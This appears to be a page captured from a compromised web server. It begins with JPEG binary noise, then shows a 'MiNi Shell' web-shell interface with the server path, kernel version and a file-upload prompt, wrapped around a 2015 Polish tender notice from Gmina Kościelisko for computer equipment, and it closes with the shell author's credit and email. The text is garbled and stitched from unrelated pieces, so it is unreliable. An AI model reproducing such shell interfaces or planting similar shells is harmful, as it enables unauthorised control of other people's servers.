JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151215/342646-N-2015.html

<p class="kh_header"><b>Kościelisko: Dostawa sprzętu komputerowego wraz z oprogramowaniem, instalacją i konfiguracją do Urzędu Gminy Kościelisko - II przetarg nieograniczony</b><br>
<b>Numer ogłoszenia: 342646 - 2015; data zamieszczenia: 15.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem, instalacją i konfiguracją do Urzędu Gminy Kościelisko - II przetarg nieograniczony.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zestawów komputerowych wraz z oprogramowaniem, instalacją i konfiguracją do Urzędu Gminy Kościelisko.
Przedmiot zamówienia obejmuje: 
Dostawę fabrycznie nowego sprzętu komputerowego (komputer stacjonarny z systemem operacyjnym, klawiatura, myszka, pakiet biurowy) zgodnie ze specyfikacją określoną w załączniku nr 1 do SIWZ.
W ilości:
-	12 sztuk zestawów komputerowych stacjonarnych typu 1
-	1 sztuka zestawu komputerowego stacjonarnego typu 2 
-	1 sztuka zestawu komputerowego stacjonarnego typu 3 
-	8 sztuk monitorów
-	14 sztuk UPS
-	1 sztuka drukarka
Przedmiot zamówienia obejmuje także:
1)	transport do siedziby Urzędu Gminy Kościelisko, instalację, konfigurację i uruchomienie dostarczonego sprzętu komputerowego,
2)	udzielenie gwarancji na okres co najmniej 24 miesięcy od dnia ostatecznego odbioru przedmiotu zamówienia - zgodnie z warunkami określonymi w załączniku nr 7 do SIWZ  wzór karty gwarancyjnej,
3)	udzielenie wsparcia technicznego oraz świadczenie serwisu w okresie 24 miesięcy od dnia ostatecznego odbioru przedmiotu umowy, polegające na udzielaniu doradztwa i wsparcia użytkownikom we wszelkich kwestiach dotyczących użytkowania sprzętu - za pośrednictwem różnych środków komunikacji (infolinia telefoniczna, zgłoszenia internetowe) - rozmowę telefoniczną z Użytkownikiem i udzielenie wskazówek prowadzących do rozwiązania problemu, rozwiązanie problemu, w przypadku braku możliwości usunięcia usterki zdalnie, wykonawca ustala termin wizyty z użytkownikiem i dokonuje usunięcia usterki/problemu na miejscu. Usterka musi być usunięta w ciągu dwóch dni roboczych. 
Uwagi do przedmiotu zamówienia:
1)	Zamawiający wymaga, aby dostarczony sprzęt był fabrycznie nowynie może nosić znamion użycia, musi być sprawny i posiadać wyposażenie niezbędne do funkcjonalnego działania oraz musi spełniać normy energooszczędności.
2)	Poszczególne części składowe stanowiące przedmiot zamówienia winne być ze sobą kompatybilne. 
3)	Wykonawca dokona instalacji, konfiguracji sprzętu komputerowego wraz z wymaganym oprogramowaniem tak aby był on gotowy do pracy. Koszty opłat ponosi wykonawca i są one wliczone w cenę ogólną. Wszystkie programy wymagające aktywizacji winny być aktywowane najpóźniej w momencie uruchomienia. 
4)	Wykonawca zobowiązany jest do zainstalowania wymaganego w SIWZ oprogramowania oraz konfiguracji i uruchomienia sprzętu.
5)	Wykonawca jest zobowiązany, po wykonaniu przedmiotu zamówienia, do przekazania Zamawiającemu kompletu oprogramowania i sterowników do zestawów komputerowych, licencji dla wymaganego oprogramowania, a także niezbędnych do instalacji oprogramowania i jego legalnego użytkowania kluczy sprzętowych, numerów seryjnych, kodów aktywacyjnych i innych - każdy komplet opisany - informujący co najmniej o dacie, miejscu - adresie wykonanej usługi. 
6)	Wszystkie nazwy ujęte w SIWZ i jej załącznikach odnoszą się do zastosowania równoważnych lub zamiennych klas, typów, firm jednak o nie gorszych parametrach technicznych Do oferty należy załączyć dokumenty określające parametry techniczne elementów zastosowanych jako równoważne. Zastosowane elementy jako równoważne muszą posiadać certyfikaty bezpieczeństwa. Równoważność oznacza, że przedmiot zamówienia, zaoferowany przez Wykonawcę, posiada wszystkie cechy techniczne i jakościowe przedmiotu określonego przez Zamawiającego a różni się od niego znakiem towarowym, patentem lub pochodzeniem. Jako równoważne Zamawiający uzna produkty: - których jakość jest zgodna z wymaganiami normowymi, atestami, świadectwami; dopuszczenia produktów opisanych przez Zamawiającego;  o takim samym przeznaczeniu; tożsame tematycznie;  które nie obniżą określonych w opisie przedmiotu zamówienia standardów;  które mają wymiary/liczbę elementów wskazane przez Zamawiającego.
7)	Wymagania ogólne dla wszystkich urządzeń informatycznych: 
-	Wszystkie oferowane urządzenia muszą być fabrycznie nowe. 
-	Wszystkie oferowane urządzenia muszą być wyprodukowane zgodnie z obowiązującymi normami jakości.
-	Urządzenia muszą być dostarczone Zamawiającemu w oryginalnych opakowaniach fabrycznych. 
-	Do każdego urządzenia musi być dostarczony komplet standardowej dokumentacji w formie papierowej lub elektronicznej. 
-	Do każdego urządzenia musi być dostarczony komplet nośników umożliwiających odtworzenie oprogramowania zainstalowanego w urządzeniu.
-	Wszystkie urządzenia zostaną dostarczone z niezbędnym okablowaniem zasilającym i transmisyjnym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówień uzupełniających może być dostawa zestawów komputerowych wraz z oprogramowaniem, instalacją i konfiguracją do Urzędu Gminy Kościelisko.
Przedmiot zamówienia obejmuje: 
Dostawę fabrycznie nowego sprzętu komputerowego (komputer stacjonarny z systemem operacyjnym, klawiatura, myszka, pakiet biurowy)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.00.00-0, 48.31.00.00-4, 72.61.10.00-6, 51.60.00.00-8, 45.31.43.20-0, 48.62.00.00-0, 48.62.40.00-8, 50.31.20.00-5, 50.30.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawcy zobowiązani są wnieść wadium w wysokości: 1 000,00 zł (słownie: jeden tysiąc złotych 0/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin realizacji zamówienia - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia zawarte w projekcie umowy mogą ulec zmianie w następujących przypadkach:
1)	W przypadku ustawowej zmiany podatku od towarów i usług
2)	W przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10   października 2002r. o minimalnym wynagrodzeniu za pracę.
3)	W przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zwrotne .
4)	jeżeli zmiany określone w ust. 1,2,3 będą miały wpływ na koszty wykonania przez wykonawcę zamówienia publicznego, każda ze stron umowy, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia. Strona wnioskująca zobowiązana jest racjonalnie wykazać w jakim stopniu zaistniałe ww. zmiany mają wpływ na koszt wykonania zamówienia.
5)	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów  przedstawionych w umowie - na wniosek Zamawiającego lub Wykonawcy.
6)	Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy. 
7)	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.
8)	Zmiany terminu dokonania odbioru przewidzianych w umowie, 
9)	Siły wyższej,
10)	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
11)	W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu co do wprowadzenia tych zmian.
12)	zmiana sposobu spełnienia świadczenia (rozwiązania zamienne) będzie możliwa w przypadku konieczności zmiany sprzętu, urządzeń, w sytuacji gdy wykorzystanie sprzętu urządzeń wskazanych w dokumentacji lub ofercie stanie się niemożliwe z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi; powyższa zmiana umowy jest dopuszczalna pod warunkiem zmiany na materiały, urządzenia i sprzęt, posiadające co najmniej takie parametry jakościowe i cechy użytkowe jak te, które stanowiły podstawę wyboru oferty pod warunkiem niezwiększenia ceny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko - 34-511 Kościelisko ul. Strzelców Podhalańskich 44 - pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2015 godzina 10:00, miejsce: Urząd Gminy Kościelisko - 34-511 Kościelisko ul. Strzelców Podhalańskich 44 - pokój nr 7 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com